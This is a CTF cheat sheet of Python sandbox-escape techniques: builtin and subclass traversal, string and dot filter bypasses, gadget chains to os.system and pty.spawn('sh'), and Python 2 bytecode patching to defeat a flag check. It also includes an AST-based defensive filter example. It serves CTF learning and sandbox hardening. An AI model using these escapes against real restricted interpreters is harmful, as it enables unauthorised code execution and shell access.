
title: CheatSheet PyJails
date: Jul 08, 2021
tags: Writeups DamCTF CTF_review Pwn Malware Misc Reverse Web EC2_2021 CheatSheets SQLi Programming Nmap Tools PyJails HeroCTF_v3 Steganography


PyJails

python





Testing for python 2 or 3

print 1 # Works on Python 2; SyntaxError on Python 3


Python Builtins Functions


Python 2 - Exploit

input(__import__('os').system('X'))


Useful Functions

vars() # or locals() / globals(): list the Python variables in scope
dir() # List all attributes of an object
().__class__.__base__.__subclasses__() # List all loaded classes (subclasses of object)
hex() # Convert an integer to a hex string (useful when a character cannot be typed directly)


Function Information

# Python 2
function.func_code.co_code # Compiled bytecode of the function
function.func_code.co_varnames # Local variable names
function.func_code.co_consts # Constants used by the function
function.func_code.co_filename # Source file name
function.func_globals # Global namespace of the function
function.__globals__ # Same as func_globals

# Python 3
function.__code__.co_code # Compiled bytecode of the function
function.__code__.co_varnames # Local variable names
function.__code__.co_consts # Constants used by the function
function.__code__.co_filename # Source file name


Dot Bypass

getattr({'Object'}, dir({'Object'})[{'Attribute index'}]) # Attribute access without writing a dot


Strings Bypass

eval('__im'+'port__') # Concatenation: the full name never appears in the source text
print('__im''port__') # Adjacent literals are joined at compile time
eval("__im"+"port__")
print("__im""port__")


Maximum Len Bypass

__builtins__['_']=().__class__
__builtins__['_']=_.__base__
__builtins__['_']=_.__subclasses__
__builtins__['_']()

x = ().__class__
x = x.__base__
...
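Added example (not from the original cheat sheet): why a plain substring blacklist misses the string and dot bypasses above, and an ast-based allowlist check that rejects them. The blocklist, the allowlist and the sample inputs are constructed for illustration; Python 3.8+ is assumed.

```python
import ast

# Constructed blacklist of the kind the string/dot bypasses above defeat.
BLOCKED = ("__import__", "__builtins__", "__subclasses__", "getattr", "eval")

def substring_filter(src: str) -> bool:
    """Naive check: accept unless the raw text contains a blocked substring."""
    return not any(bad in src for bad in BLOCKED)

# Allowlist for a structural check: literals, arithmetic, comparisons and
# a handful of builtins. No Attribute (the dot) and no Subscript at all.
ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp,
                 ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub, ast.Compare,
                 ast.Eq, ast.NotEq, ast.Lt, ast.Gt, ast.Call, ast.Name,
                 ast.Load, ast.List, ast.Tuple)
ALLOWED_NAMES = {"abs", "min", "max", "len"}

def ast_filter(src: str) -> bool:
    """Structural check: parse as a single expression and inspect every node."""
    try:
        tree = ast.parse(src, mode="eval")  # statements such as "x = ..." fail here
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False  # e.g. ().__class__ is an Attribute node
        if isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            return False  # e.g. eval, getattr, __builtins__
        if isinstance(node, ast.Call) and not isinstance(node.func, ast.Name):
            return False  # only direct calls of allowlisted names
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and "__" in node.value:
            return False  # '__im''port__' is one Constant once parsed
    return True

if __name__ == "__main__":
    # Constructed inputs: the bypass patterns from this sheet plus one benign expression.
    for src in ("'__im'+'port__'", "'__im''port__'",
                "().__class__.__base__.__subclasses__()", "max(1, 2) + len([3])"):
        print(f"{src!r:45} substring={substring_filter(src)!s:5} ast={ast_filter(src)}")
```

The substring filter passes both string-concatenation forms because the blocked name never appears in the source text, while the AST check rejects them from the parsed constants.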


Interesting Class

<class 'warnings.catch_warnings'> -> catch_warnings()._module.__builtins__['__import__']
<class 'warnings.catch_warnings'> -> catch_warnings().__repr__.im_func.func_globals["linecache"].os.system('XXX')
<class 'site._Printer'> -> site._Printer._Printer__setup.__globals__['os']
<class 'site.pty'> -> pty.spawn("sh")
<class 'sys'> -> sys.modules


Disassembling a Function

# Python 2.X

import dis
import new

co = {'Function name'}.__code__

co_code = co.co_code
varnames = co.co_varnames
names = co.co_names
consts = co.co_consts

dis.disassemble_string(     # Print the bytecode with names and constants resolved
    list(co_code),
    1,
    varnames,
    names,
    consts
)

co_code = list(co_code)     # Bytecode as a mutable list of one-byte strings
# Method 1: overwrite the first instruction with JUMP_ABSOLUTE (0x71) to a chosen offset
co_code[0], co_code[1], co_code[2] = list('\x71\x{jump address value}\x00')
# Method 2: flip a comparison, COMPARE_OP argument 2 (==) becomes 3 (!=)
co_code[{compare argument offset}] = '\x03'

co_argc = co.co_argcount
co_nlocal = co.co_nlocals
stack_size = co.co_stacksize
flags = co.co_flags
file_name = co.co_filename
name = co.co_name
firstlineno = co.co_firstlineno
lnotab = co.co_lnotab

def _():
    pass

_.func_code = new.code(     # Rebuild a code object around the patched bytecode
    co_argc,
    co_nlocal,
    stack_size,
    flags,
    ''.join(co_code),
    consts,
    names,
    varnames,
    file_name,
    name,
    firstlineno,
    lnotab
)

print('\n')
_('Give me the flag')


Other Cheat Sheet


Interesting Writeups


My PyJails Challenges

Coming Soon...